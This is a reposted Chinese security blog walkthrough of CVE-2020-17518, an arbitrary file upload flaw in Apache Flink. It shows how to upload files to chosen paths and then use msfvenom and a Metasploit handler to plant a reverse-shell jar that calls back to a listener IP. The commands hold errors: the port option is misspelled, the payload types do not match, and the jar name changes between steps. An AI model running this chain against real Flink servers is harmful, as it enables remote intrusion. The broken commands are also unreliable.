Apache Flink 文件上传漏洞 (CVE-2020-17518)

本文阅读 2 分钟

Apache Flink 是一个框架和分布式处理引擎,用于在无边界和有边界数据流上进行有状态的计算。Flink 能在所有常见集群环境中运行,并能以内存速度和任意规模进行计算。Apache Flink 是一个分布式系统,它需要计算资源来执行应用程序。Flink 集成了所有常见的集群资源管理器,例如 Hadoop YARN、 Apache Mesos 和 Kubernetes,但同时也可以作为独立集群运行。

在Apache Flink1.5.1中引入了 REST 处理程序,允许通过恶意修改HTTP HEADER将上传的文件写入本地文件系统上的任意位置。 攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置。

影响版本:
Apache:Apache Flink: 1.5.1 ---- 1.11.2

1、访问Add New,上传 img 2、任意构造上传路径,上传文件。虽然响应显示400,但是已经上传成功。 img 3、进入容器. img 4、执行命令,查看上传的文件。 img

1、Flink支持上传jar包并且执行,所以这里可以通过上传jar包获取Webshell。 利用msfvenom工具生成.jar格式的木马,LHOST、LPORT为监听机器的IP和端口,此处利用Kali作为监听机。

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.198.128 LOBPORT=4444 -f jar > rce.jar

2、在监听机执行

use exploit/multi/handler 
set payload java/shell/reverse_tcp 
set LHOST 192.168.198.128
set LPORT 4444 
run

3、访问主页,点击Add New按钮,上传生成的rec.jar。 img

4、成功反弹shell。 img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/sycamorelg/article/details/120763359
-- 展开阅读全文 --
Web安全—逻辑越权漏洞(BAC)
« 上一篇 03-13
Redis底层数据结构--简单动态字符串
下一篇 » 04-10

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复